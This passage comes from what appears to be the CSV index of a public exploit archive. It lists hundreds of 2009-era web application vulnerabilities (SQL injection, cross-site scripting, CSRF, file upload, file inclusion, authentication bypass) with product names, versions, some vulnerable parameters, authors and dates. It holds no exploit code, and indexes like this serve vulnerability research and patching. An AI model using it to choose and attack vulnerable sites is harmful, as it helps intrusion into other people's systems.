Cross-Site Scripting",2009-12-08,mr_me,php,webapps, -10356,exploits/php/webapps/10356.txt,"Joomla! Component com_job - 'showMoreUse' SQL Injection",2009-12-08,Palyo34,php,webapps, -10357,exploits/php/webapps/10357.txt,"Alqatari group 1.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps, -10358,exploits/php/webapps/10358.txt,"AlefMentor 2.0 < 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps, -10361,exploits/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps, -10364,exploits/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps, -10366,exploits/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps, -10367,exploits/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps, -10368,exploits/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps, -10369,exploits/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps, -10370,exploits/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,php,webapps, -10372,exploits/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps, -10376,exploits/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 -10378,exploits/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps, -10379,exploits/php/webapps/10379.txt,"oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force",2009-12-11,"Milos Zivanovic",php,webapps, -10383,exploits/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps, -10384,exploits/php/webapps/10384.txt,"E-Store - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps, -10386,exploits/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities",2005-05-07,"Thomas Liam Romanis",solaris,webapps, -10388,exploits/php/webapps/10388.txt,"Chipmunk NewsLetter - Cross-Site Request Forgery",2009-12-11,"Milos Zivanovic",php,webapps, -10389,exploits/php/webapps/10389.txt,"Illogator Shop - SQL Injection Bypass",2009-12-11,bi0,php,webapps, -10390,exploits/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps, -10391,exploits/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps, -10393,exploits/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps, -14948,exploits/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps, -10395,exploits/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps, -10398,exploits/php/webapps/10398.txt,"ZeeCareers 2.x - PHP HR Manager Website (Cross-Site Scripting / Authentication Bypass)",2009-12-12,bi0,php,webapps, -10400,exploits/php/webapps/10400.txt,"Acc Auto Dealer Script 5.0 - Persistent Cross-Site Scripting / SQL Backup",2009-12-13,bi0,php,webapps, -10403,exploits/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps, -10404,exploits/php/webapps/10404.txt,"Interspire Shopping Cart - Full Path Disclosure",2009-12-13,Mr.aFiR,php,webapps, -10406,exploits/php/webapps/10406.txt,"AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)",2009-12-13,"Milos Zivanovic",php,webapps, -10407,exploits/php/webapps/10407.txt,"Joomla! Component com_virtuemart 1.0 - 'Product_ID' SQL Injection",2009-12-13,"SOA Crew",php,webapps, -10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",php,webapps, -10410,exploits/php/webapps/10410.txt,"phpLDAPadmin - Local File Inclusion",2009-12-10,ipsecs,php,webapps, -10412,exploits/php/webapps/10412.txt,"Acc PHP eMail 1.1 - Cross-Site Request Forgery",2009-12-13,bi0,php,webapps, -10414,exploits/php/webapps/10414.txt,"Frog CMS 0.9.5 - Cross-Site Request Forgery",2009-12-13,"Milos Zivanovic",php,webapps, -10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps, -10418,exploits/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",php,webapps, -10419,exploits/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-13,"Milos Zivanovic",php,webapps, -10420,exploits/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps, -10421,exploits/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusions",2009-12-14,"1nd0n3s14n l4m3r",php,webapps, -10422,exploits/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps, -10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,multiple,webapps, -10425,exploits/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Authentication Bypass",2009-12-14,Mr.aFiR,asp,webapps, -10426,exploits/linux/webapps/10426.txt,"[WS] upload - Arbitrary File Upload",2009-12-14,ViRuSMaN,linux,webapps,80 -10427,exploits/linux/webapps/10427.txt,"Digital Hive - Multiple Vulnerabilities",2009-12-14,ViRuSMaN,linux,webapps,80 -10428,exploits/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Arbitrary File Upload",2009-12-14,ViRuSMaN,windows,webapps,80 -10429,exploits/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Arbitrary File Upload",2009-12-14,ViRuSMaN,linux,webapps,80 -10430,exploits/linux/webapps/10430.txt,"NAS Uploader 1.0/1.5 - Arbitrary File Upload",2009-12-14,ViRuSMaN,linux,webapps,80 -10431,exploits/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,multiple,webapps,80 -10432,exploits/multiple/webapps/10432.txt,"Zabbix Server - Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 -10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",linux,webapps,80 -10436,exploits/php/webapps/10436.txt,"Link Up Gold - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,php,webapps, -10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps, -10438,exploits/php/webapps/10438.txt,"AdManagerPro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,php,webapps, -10439,exploits/php/webapps/10439.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps, -10440,exploits/php/webapps/10440.txt,"Easy Banner Pro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,php,webapps, -10442,exploits/php/webapps/10442.txt,"Text Exchange Pro - Cross-Site Request Forgery (Add Admin)",2009-12-14,bi0,php,webapps, -10444,exploits/php/webapps/10444.txt,"mini Hosting Panel - Cross-Site Request Forgery (Change Admin Settings)",2009-12-14,"Milos Zivanovic",php,webapps, -10445,exploits/php/webapps/10445.txt,"Tender System 0.9.5b - Local File Inclusion",2009-12-14,Packetdeath,php,webapps, -10446,exploits/php/webapps/10446.txt,"WSCreator 1.1 - Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps, -10447,exploits/php/webapps/10447.txt,"Traidnt Discovery - Cross-Site Request Forgery (Create Staff Account)",2009-12-14,G0D-F4Th3r,php,webapps, -10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,multiple,webapps, -10449,exploits/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection",2009-12-15,Securitylab.ir,asp,webapps, -10450,exploits/php/webapps/10450.txt,"Linkster - PHP/MySQL SQL Injection",2009-12-15,"Angela Zhang",php,webapps, -10452,exploits/php/webapps/10452.txt,"Ez News Manager / Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-15,"Milos Zivanovic",php,webapps, -10453,exploits/php/webapps/10453.txt,"SitioOnline - SQL Injection",2009-12-15,4lG3r14n0-t3r0,php,webapps, -10454,exploits/php/webapps/10454.txt,"Ez Faq Maker - Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps, -10455,exploits/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - 'PageId' SQL Injection",2009-12-15,Red-D3v1L,asp,webapps, -10456,exploits/asp/webapps/10456.txt,"ClickTrackerASP - 'sitedetails.asp?siteid' SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps, -10457,exploits/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps, -10458,exploits/php/webapps/10458.txt,"Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps, -10461,exploits/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps, -10462,exploits/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps, -10463,exploits/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps, -10464,exploits/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps, -10465,exploits/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps, -10467,exploits/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps, -10470,exploits/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,asp,webapps, -10472,exploits/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps, -10473,exploits/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps, -10474,exploits/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps, -10476,exploits/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps, -10478,exploits/php/webapps/10478.txt,"iSupport 1.8 - Cross-Site Scripting / Local File Inclusion",2009-12-16,"Stink & Essandre",php,webapps, -10479,exploits/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection",2009-12-16,"Nahuel Grisolia",php,webapps, -10480,exploits/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps, -10481,exploits/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps, -10482,exploits/asp/webapps/10482.txt,"Codefixer Membership - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps, -10483,exploits/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps, -10485,exploits/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps, -10488,exploits/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps, -10492,exploits/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps, -10493,exploits/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX & Cr3W-DZ",php,webapps, -10494,exploits/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX & Cr3W-DZ",php,webapps, -10495,exploits/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps, -10496,exploits/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps, -10497,exploits/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps, -10498,exploits/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php?id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps, -10499,exploits/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps, -10500,exploits/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps, -10501,exploits/asp/webapps/10501.txt,"Texas Rankem - 'player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps, -10502,exploits/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps, -10503,exploits/asp/webapps/10503.txt,"ASPGuest - 'edit.asp?ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps, -10504,exploits/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp?CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps, -10505,exploits/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps, -10507,exploits/asp/webapps/10507.txt,"Charon Cart 3.0 - 'ContentID' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps, -10511,exploits/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",php,webapps, -10512,exploits/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",php,webapps, -10513,exploits/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps, -10514,exploits/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps, -10515,exploits/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Arbitrary Add Admin",2009-12-17,RENO,php,webapps, -10516,exploits/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-17,bi0,php,webapps, -10517,exploits/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps, -10520,exploits/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps, -10522,exploits/php/webapps/10522.txt,"Pre Job Board 1.0 - Authentication Bypass",2009-12-17,bi0,php,webapps, -10523,exploits/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,php,webapps, -10525,exploits/asp/webapps/10525.txt,"Pre Jobo .NET - Authentication Bypass",2009-12-17,bi0,asp,webapps, -10526,exploits/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps, -10527,exploits/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps, -10528,exploits/php/webapps/10528.txt,"V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection",2009-12-17,R3d-D3V!L,php,webapps, -10529,exploits/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps, -10531,exploits/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps, -10532,exploits/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps, -10533,exploits/php/webapps/10533.txt,"VirtueMart - 'Product_ID' SQL Injection",2009-12-17,Neo-GabrieL,php,webapps, -10534,exploits/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps, -10535,exploits/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps, -10537,exploits/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,cr4wl3r,php,webapps, -10540,exploits/asp/webapps/10540.txt,"E-Smart Cart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps, -10543,exploits/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX & Cr3W-DZ",php,webapps, -10545,exploits/php/webapps/10545.txt,"Joomla! Component com_jbook - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps, -10546,exploits/php/webapps/10546.txt,"Joomla! Component com_digistore - SQL Injection",2009-12-18,FL0RiX,php,webapps, -10547,exploits/php/webapps/10547.txt,"Joomla! Component com_acmisc - SQL Injection",2009-12-18,FL0RiX,php,webapps, -10548,exploits/php/webapps/10548.txt,"Joomla! Component com_zcalendar - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps, -10549,exploits/php/webapps/10549.txt,"Joomla! Component Event Manager - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps, -10550,exploits/php/webapps/10550.txt,"Joomla! Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps, -10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps, -10555,exploits/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities",2009-12-19,Global-Evolution,php,webapps, -10558,exploits/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,ViRuSMaN,asp,webapps, -10560,exploits/php/webapps/10560.txt,"Lizard Cart - Multiple SQL Injections",2009-12-19,cr4wl3r,php,webapps, -10561,exploits/php/webapps/10561.txt,"CFAGCMS - SQL Injection",2009-12-19,cr4wl3r,php,webapps, -10562,exploits/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps, -10564,exploits/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps, -10566,exploits/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps, -10567,exploits/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps, -10568,exploits/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps, -10569,exploits/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusions",2009-12-20,cOndemned,php,webapps, -10570,exploits/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps, -10571,exploits/php/webapps/10571.txt,"PacketFence Network Access Controller - Cross-Site Scripting",2009-12-20,K053,php,webapps, -10572,exploits/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps, -10573,exploits/asp/webapps/10573.txt,"8Pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps, -10574,exploits/php/webapps/10574.txt,"phUploader 2 - Arbitrary File Upload",2009-12-20,wlhaan-hacker,php,webapps, -10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,php,webapps, -10576,exploits/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure",2009-12-21,LionTurk,asp,webapps, -10578,exploits/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Arbitrary File Upload",2009-12-21,"Master Mind",php,webapps, -10582,exploits/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,asp,webapps, -10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,php,webapps, -10584,exploits/php/webapps/10584.txt,"PHPhotoalbum - Arbitrary File Upload",2009-12-21,"wlhaan hacker",php,webapps, -10585,exploits/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps, -10586,exploits/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps, -10587,exploits/php/webapps/10587.txt,"Joomla! Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps, -10588,exploits/php/webapps/10588.txt,"PDQ Script 1.0 - 'listingid' SQL Injection",2009-12-21,SecurityRules,php,webapps, -10590,exploits/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection",2009-12-21,Stack,php,webapps, -10591,exploits/php/webapps/10591.txt,"Joomla! Component com_mediaslide - Directory Traversal",2009-12-21,Mr.tro0oqy,php,webapps, -10592,exploits/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps, -10594,exploits/php/webapps/10594.txt,"The Uploader 2.0 - Arbitrary File Upload",2009-12-22,"Master Mind",php,webapps, -10597,exploits/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps, -10598,exploits/php/webapps/10598.txt,"DeluxeBB 1.3 - Multiple Vulnerabilities",2009-12-22,cp77fk4r,php,webapps, -10599,exploits/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,php,webapps, -10600,exploits/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps, -10601,exploits/php/webapps/10601.txt,"Mini File Host 1.5 - Arbitrary File Upload",2009-12-22,MR.Z,php,webapps, -10604,exploits/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps, -10606,exploits/php/webapps/10606.txt,"weenCompany - SQL Injection",2009-12-22,Gamoscu,php,webapps, -10609,exploits/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,php,webapps, -10611,exploits/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps, -10612,exploits/php/webapps/10612.txt,"Add An Ad Script - Arbitrary File Upload",2009-12-23,MR.Z,php,webapps, -10614,exploits/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps, -10615,exploits/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection",2009-12-23,"Hussin X",php,webapps, -10621,exploits/php/webapps/10621.txt,"XP Book 3.0 - login Admin",2009-12-23,"wlhaan hacker",php,webapps, -10624,exploits/php/webapps/10624.txt,"Joomla! Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps, -10625,exploits/php/webapps/10625.txt,"Joomla! Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps, -10626,exploits/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login",2009-12-24,Sora,php,webapps, -10629,exploits/php/webapps/10629.txt,"Traidnt Gallery - Arbitrary Add Admin",2009-12-24,wlhaan-hacker,php,webapps, -10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,multiple,webapps, -10632,exploits/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,php,webapps, -10633,exploits/php/webapps/10633.txt,"Pragyan CMS 2.6.4 - 'search.php' Remote File Inclusion",2009-12-24,Mr.SeCreT,php,webapps, -10637,exploits/asp/webapps/10637.txt,"Web Wiz NewsPad - Database Disclosure",2009-12-24,ViRuSMaN,asp,webapps, -10638,exploits/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure",2009-12-24,ViRuSMaN,asp,webapps, -10639,exploits/asp/webapps/10639.txt,"Snitz Forums 2000 - Database Disclosure",2009-12-24,ViRuSMaN,asp,webapps, -10640,exploits/php/webapps/10640.txt,"Joomla! Component com_schools - SQL Injection",2009-12-24,Mr.tro0oqy,php,webapps, -10645,exploits/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps, -10647,exploits/php/webapps/10647.txt,"VideoIsland - Arbitrary File Upload",2009-12-24,RENO,php,webapps, -10648,exploits/php/webapps/10648.txt,"cms -db 0.7.13 - Multiple Vulnerabilities",2009-12-25,cp77fk4r,php,webapps, -10649,exploits/windows/webapps/10649.html,"SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method",2009-12-25,"ThE g0bL!N",windows,webapps, -10652,exploits/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps, -10653,exploits/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -10654,exploits/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -10656,exploits/php/webapps/10656.txt,"SoftBiz B2B trading Marketplace Script - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps, -10658,exploits/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -10660,exploits/php/webapps/10660.txt,"barbo91 uploads - Arbitrary File Upload",2009-12-25,indoushka,php,webapps, -10661,exploits/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -10665,exploits/php/webapps/10665.txt,"Jevonweb Guestbook - Remote Admin Access",2009-12-25,Sora,php,webapps, -10666,exploits/php/webapps/10666.txt,"Simple PHP Guestbook - Remote Admin Access",2009-12-25,Sora,php,webapps, -10667,exploits/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10668,exploits/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10669,exploits/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10670,exploits/php/webapps/10670.txt,"vCard PRO 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10671,exploits/php/webapps/10671.txt,"Info Fisier 1.0 - Arbitrary File Upload",2009-12-26,"wlhaan hacker",php,webapps, -10672,exploits/php/webapps/10672.txt,"kandalf upper 0.1 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10673,exploits/php/webapps/10673.txt,"DieselScripts jokes - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10674,exploits/php/webapps/10674.txt,"DieselScripts jokes - Backup",2009-12-26,indoushka,php,webapps, -10675,exploits/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10677,exploits/php/webapps/10677.txt,"PHPShop 0.6 - Bypass",2009-12-26,indoushka,php,webapps, -10679,exploits/php/webapps/10679.txt,"Quiz - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10680,exploits/php/webapps/10680.txt,"E-Pay - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10681,exploits/php/webapps/10681.txt,"Saibal Download Area 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10682,exploits/php/webapps/10682.txt,"Dros - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10683,exploits/php/webapps/10683.txt,"TomatoCart - Backup",2009-12-26,indoushka,php,webapps, -10684,exploits/php/webapps/10684.txt,"Upload-Point 1.6 Beta - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10686,exploits/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure",2009-12-26,LionTurk,asp,webapps, -10687,exploits/php/webapps/10687.txt,"SaphpLesson 4.0 food - Remote File Inclusion",2009-12-26,indoushka,php,webapps, -10688,exploits/php/webapps/10688.txt,"Flatpress - Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,php,webapps, -10690,exploits/php/webapps/10690.txt,"IMG2ASCII - 